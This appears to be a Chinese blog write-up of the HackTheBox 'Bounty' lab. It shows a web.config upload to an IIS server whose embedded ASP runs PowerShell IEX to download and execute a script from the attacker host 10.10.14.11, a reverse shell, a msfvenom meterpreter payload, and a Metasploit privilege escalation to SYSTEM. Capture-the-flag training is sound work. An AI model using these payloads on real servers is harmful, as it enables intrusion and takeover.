Bounty-htb-writeup

0x00 靶场技能介绍

章节技能:恶劣的靶机环境体验、难搞的目录文件扫描、aspx服务配置文件上传、Invoke-PowerShellTcp.ps1初始shell建立、JuicyPotato攻击

参考链接:https://0xdf.gitlab.io/2018/10/27/htb-bounty.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.93

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.93 -oG allports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-21 14:47 CST
Nmap scan report for 10.10.10.93
Host is up (0.45s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 -sC -sV --min-rate=10000 10.10.10.93 -oG allports2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-21 14:48 CST
Nmap scan report for 10.10.10.93
Host is up (0.40s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

3、查看下网站首页情况

http://10.10.10.93/

4、扫描下目录情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali# gobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.93/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Output file  : gobuster_root
[+] Status codes : 301,302,307,200,204
[+] Extensions   : .aspx
=====================================================
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
=====================================================

5、查看下响应 200 的目录

http://10.10.10.93/transfer.aspx

6、尝试下00阶段上传

1
2
Content-Disposition: form-data; name="FileUpload1"; filename="cmdasp.aspx%00.jpg"
Content-Type: application/octet-stream

7、显示是成功了,但是实际访问的时候还是不行的

8、通过翻阅演练报告,发现这里是需要上传配置型的文件才行

然后开始找支持APS.NET解析的文件后缀,google到官方文档:ASP.NET Web项目文件类型:https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN

9、经过各种尝试修改,终于是完美的上传成功,并利用了,靶机环境还是恶劣啊!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
引用:包含 XML 元素的配置文件(通常为 Web.config),该元素代表 ASP.NET 功能的设置。

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
          <hiddenSegments>
            <remove segment="web.config" />
          </hiddenSegments>
       </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/Invoke-PowerShellTcp.ps1')")
%>
-->

在 Invoke-PowerShellTcp.ps1 文件的尾部加上下面的语句。

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 443

10、上传并访问我们的配置文件

http://10.10.10.93/uploadedfiles/web.config

11、自搭建的WEB服务成功接收到靶机来下载的请求

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [23/Mar/2024 15:58:23] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

12、获取到初始的反弹shell环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
 connect to [10.10.14.11] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv> cd C:\Users\merlin\Desktop\    
PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> cd ../
PS C:\Users\merlin> cd ../
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d----         5/31/2018  12:18 AM            Administrator                     
d----         5/30/2018   4:44 AM            Classic .NET AppPool              
d----         5/30/2018  12:22 AM            merlin                            
d-r--         5/30/2018   5:44 AM            Public                            


PS C:\Users> cd Public
PS C:\Users\Public> cd Desktop
PS C:\Users\Public\Desktop> dir
PS C:\Users\Public\Desktop> Get-ChildItem : Access to the path 'C:\Users\Public\Desktop' is denied.
At line:1 char:4
+ dir <<<< 
    + CategoryInfo          : PermissionDenied: (C:\Users\Public\Desktop:Strin 
   g) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell. 
   Commands.GetChildItemCommand
 

PS C:\Users\Public\Desktop> cd C:\Users\merlin\Desktop
PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> ls
PS C:\Users\merlin\Desktop> ls -la
PS C:\Users\merlin\Desktop> Invoke-PowerShellTcp : A parameter cannot be found that matches parameter name 
'la'.
At line:128 char:21
+ Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.14.11 -Port 443
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep 
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio 
   n,Invoke-PowerShellTcp
 

PS C:\Users\merlin\Desktop> dir
PS C:\Users\merlin\Desktop> cd ../
PS C:\Users\merlin> dir


    Directory: C:\Users\merlin


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d-r--         5/30/2018  12:22 AM            Contacts                          
d-r--         5/31/2018  12:17 AM            Desktop                           
d-r--         5/30/2018  12:22 AM            Documents                         
d-r--         5/30/2018  12:22 AM            Downloads                         
d-r--         5/30/2018  12:22 AM            Favorites                         
d-r--         5/30/2018  12:22 AM            Links                             
d-r--         5/30/2018  12:22 AM            Music                             
d-r--         5/30/2018  12:22 AM            Pictures                          
d-r--         5/30/2018  12:22 AM            Saved Games                       
d-r--         5/30/2018  12:22 AM            Searches                          
d-r--         5/30/2018  12:22 AM            Videos                            


PS C:\Users\merlin> cd Desktop
PS C:\Users\merlin\Desktop> dir /ah
PS C:\Users\merlin\Desktop> Get-ChildItem : Cannot find path 'C:\ah' because it does not exist.
At line:1 char:4
+ dir <<<<  /ah
    + CategoryInfo          : ObjectNotFound: (C:\ah:String) [Get-ChildItem],  
   ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetCh 
   ildItemCommand
 

PS C:\Users\merlin\Desktop> dir /ah
PS C:\Users\merlin\Desktop> Get-ChildItem : Cannot find path 'C:\ah' because it does not exist.
At line:1 char:4
+ dir <<<<  /ah
    + CategoryInfo          : ObjectNotFound: (C:\ah:String) [Get-ChildItem],  
   ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetCh 
   ildItemCommand
 

PS C:\Users\merlin\Desktop>

13、不得不说这个脚本的反弹shell环境还是恶劣啊,而且用户flag还是隐藏状态,下面就获取下第一个flag信息吧

1
2
3
PS C:\Users\merlin\Desktop> type user.txt
94f4a4b6580852a2ca00499488db17c2
PS C:\Users\merlin\Desktop>

0x02 系统权限获取

14、查看下系统信息和当前用户特权信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
PS C:\Users\merlin\Desktop> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          3/23/2024, 9:57:15 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,574 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,571 MB
Virtual Memory: In Use:    524 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93
PS C:\Users\merlin\Desktop


PS C:\Users\merlin\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\merlin\Desktop>

15、这里由于靶机环境恶劣,直接采取土豆提权,结合msf使用

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

然后上传JuicyPotato攻击并获取系统权限。请在此处查看有关马铃薯攻击的详细信息。CLSID 列表在这里。

16、首先使用MSf挂起一个监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST=10.10.14.11
[-] Unknown datastore option: LHOST=10.10.14.11.
Usage: set [options] [name] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

OPTIONS:

    -c, --clear   Clear the values, explicitly setting to nil (default)
    -g, --global  Operate on global datastore variables
    -h, --help    Help banner.

msf6 exploit(multi/handler) > set LHOST 10.10.14.11
LHOST => 10.10.14.11
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.11:4444

17、使用msfvenom生成一个反弹shell的木马文件

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

18、架起Python版的WEB服务,结合那个web.config的配置文件上传我们的msf木马文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [23/Mar/2024 16:21:40] "GET /shell.exe HTTP/1.1" 200 -
10.10.10.93 - - [23/Mar/2024 16:30:02] "GET /shell.exe HTTP/1.1" 200 -


<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
          <hiddenSegments>
            <remove segment="web.config" />
          </hiddenSegments>
       </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.11/shell.exe', 'C:\Users\merlin\Desktop\shell.exe')")
%>
-->

19、上传上去后,使用初始shell进行运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\Users\merlin\Desktop> dir


    Directory: C:\Users\merlin\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---         3/23/2024  10:30 AM       7168 shell.exe                         


PS C:\Users\merlin\Desktop> shell.exe


    Directory: C:\Users\merlin\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---         3/23/2024  10:30 AM       7168 shell.exe                         


PS C:\Users\merlin\Desktop> Invoke-PowerShellTcp : The term 'shell.exe' is not recognized as the name of a 
cmdlet, function, script file, or operable program. Check the spelling of the n
ame, or if a path was included, verify that the path is correct and try again.
At line:128 char:21
+ Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.14.11 -Port 443
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep 
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio 
   n,Invoke-PowerShellTcp
 

PS C:\Users\merlin\Desktop> ./shell.exe
PS C:\Users\merlin\Desktop>

20、然后使用我们的msf进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   SESSION                    yes       The session to run this module on
   TASKNAME                   no        A name for the created task (default random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista / 7 / 2008 (Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.11
lhost => 10.10.14.11
msf6 exploit(windows/local/ms10_092_schelevator) > set lport 3333
lport => 3333
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.11:3333 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms10_092_schelevator) > exploit 

[*] Started reverse TCP handler on 10.10.14.11:3333 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms10_092_schelevator) > set AutoCheck false
AutoCheck => false
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.11:3333 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Preparing payload at C:\Windows\TEMP\VDgrYdO.exe
[*] Creating task: h9SRKQjDL3MEf
[*] Reading the task file contents from C:\Windows\system32\tasks\h9SRKQjDL3MEf...
[*] Original CRC32: 0xc1d2c065
[*] Final CRC32: 0xc1d2c065
[*] Writing our modified content back...
[*] Validating task: h9SRKQjDL3MEf
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "h9SRKQjDL3MEf" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "h9SRKQjDL3MEf" have been changed.
[*] Executing the task...
[*] Sending stage (240 bytes) to 10.10.10.93
[*] Command shell session 2 opened (10.10.14.11:3333 -> 10.10.10.93:49171) at 2024-03-23 16:48:45 +0800
[*] Deleting task h9SRKQjDL3MEf...


C:\Windows\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

21、读取最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\Administrator\Desktop

05/30/2018  11:18 PM    <DIR>          .
05/30/2018  11:18 PM    <DIR>          ..
03/23/2024  09:58 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  11,879,038,976 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
fd9e9fa8352d088834cb89e17bc87d32

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/142

打靶记
#shooting-range
Bounty-htb-writeup
https://sh1yan.top/2024/03/21/Bounty-htb-writeup/
作者
shiyan
发布于
2024年3月21日
许可协议